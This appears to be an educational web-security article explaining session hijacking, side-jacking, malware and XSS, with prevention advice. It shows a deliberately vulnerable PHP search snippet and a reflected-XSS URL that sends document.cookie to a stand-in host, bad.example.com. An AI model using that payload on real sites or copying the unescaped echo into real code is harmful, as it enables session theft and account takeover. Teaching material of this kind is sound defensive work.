In a session hijacking attack, the attacker steals the session IDs for a web application by eavesdropping on the communication between a user and an application or by gaining access to the user’s computer or web browser data. Attackers can perform session hijacking using techniques that include exploiting cross-site scripting (XSS) vulnerabilities, performing man-in-the-middle (MITM) attacks, or planting malware such as trojans.
Session identifiers (SIDs), sometimes called session keys or session tokens, are character strings used to authenticate users in web applications. These strings are generated by the application after the user successfully logs in, presented to the user’s browser, and used across different web pages or functions of the application, usually via a session cookie. Since the web browser shares the session cookie with the application in every HTTP request, the application can use the session identifier to recognize a known user.
If it weren’t for session identifiers, we would have to log in to web applications much more frequently than we do. However, a session identifier has the same weakness as a password: it is only secure while it is secret. As soon as a malicious user knows your session ID, they can get access to your account and use it for further attacks and potential privilege escalation.
In general, malicious hackers will try to get access to session identifiers to impersonate users and gain access to their accounts/privileges. There are several specific attack techniques targeting sessions:
Note that session hijacking is often used as an umbrella term for all attacks that lead to malicious hackers getting access to valid session IDs. In that sense, session fixation and session prediction may be considered sub-types of session hijacking.
Some sources also use the term session hijacking for a completely different cybersecurity topic – TCP session hijacking, which has nothing to do with web application session hijacking. Hijacking TCP/IP sessions is closely related to IP address spoofing – the attacker is trying to take over the existing TCP/IP session between the user and the server, not the web session.
There are three main approaches to session hijacking: eavesdropping on user communication, gaining access to the user’s computer, and gaining access to the user’s browser data.
Session hijacking techniques that rely on MITM attack techniques are called session side-jacking attacks. In the simplest case, when traffic is not encrypted, you only need a simple sniffer working in the same local network as the client to monitor network traffic for user connections and perform packet sniffing. This is especially common for public Wi-Fi networks.
If a website or web application uses exclusively encrypted connections, simple session sniffing won’t do, but there are other tricks that may be attempted. Some examples include:
Most session side-jacking attacks focus on stealing session cookies as the most common vehicle for session IDs. However, these methods are not limited to cookie hijacking, and many can be applied equally well to session tokens sent in other parts of HTTP requests, such as custom request headers or the request body.
In many cases, attackers attempt to infect user computer systems with malware such as trojans for the purpose of gaining session information. A well-known example of this is the man-in-the-browser attack, where session identifiers are stolen directly from the user’s web browser.
One of the most effective ways for an attacker to get a session cookie is to use a cross-site scripting attack. If your website or web application has an XSS vulnerability, the attacker would start by tricking a user into visiting your vulnerable page through a specially crafted URL. The victim is then redirected to a page that executes malicious client-side scripts in the client browser. The malicious JavaScript code accesses the user’s session cookie and sends it to an attacker-controlled server.
Here is an example of a reflected cross-site scripting (XSS) vulnerability that could be used to steal a user's session cookies:
<?php
if (isset($_GET['search']))
{
$results = search_database($_GET['search']);
echo 'Results for "'.$_GET['search'].'":<br/>';
foreach ($results as $result)
{
echo $result['result']."<br/>";
}
}
?>
An attacker could inject malicious code into the search parameter to send the user’s session cookie to a server they control:
http://example.com/search.php?search=<script>document.location='http://bad.example.com/thief.php?data='+document.cookie</script>
Most session hijacking attacks target the user (for example, the trojan-based attacks and the man-in-the-middle attacks) and have nothing to do with the web application. These attacks can only be detected by monitoring user computers and user connections.
However, cross-site scripting vulnerabilities can also make session hijacking possible and they are web vulnerabilities that you can detect by scanning your web applications. Read more about how to detect and fix XSS vulnerabilities here.
To help prevent session hijacking attacks as a web application developer or web server administrator, follow these recommendations:
To protect users from session hijacking attacks aimed directly at their computers and connections, promote the use of VPNs, especially for insecure connections, such as public Wi-Fi.
Session hijacking is a type of attack where the attacker steals session IDs for a web application by eavesdropping on traffic between the user and the application or by gaining access to the user’s computer or web browser data. Session hijacking techniques include cross-site scripting (XSS), man-in-the-middle (MITM) attacks, and malware such as trojans.
Read more about session hijacking attacks in our related blog article.
If a session hijacking attack is successful, the attacker gains unauthorized access to a user’s web application account, with similar consequences to other session attacks, such as session fixation attacks. The extent of damage depends entirely on the functionality of the web application and the privileges of the user. For example, if the attacker is able to access an administrative account for a major web application, they may expose large amounts of highly sensitive information for identity theft.
Learn more about application security practices that help avoid attacks such as session hijacking.
There is no simple way to prevent all session hijacking attacks as an app developer, but you can make session IDs less attractive to attackers by making them less valuable. For example, session IDs should be changed immediately after user authentication, after periods of inactivity (say, 10 minutes), and before any important user actions. You should also make sure that your application does not have any cross-site scripting (XSS) vulnerabilities that could make session hijacking possible.
Read about cross-site scripting (XSS) vulnerabilities that may lead to session hijacking.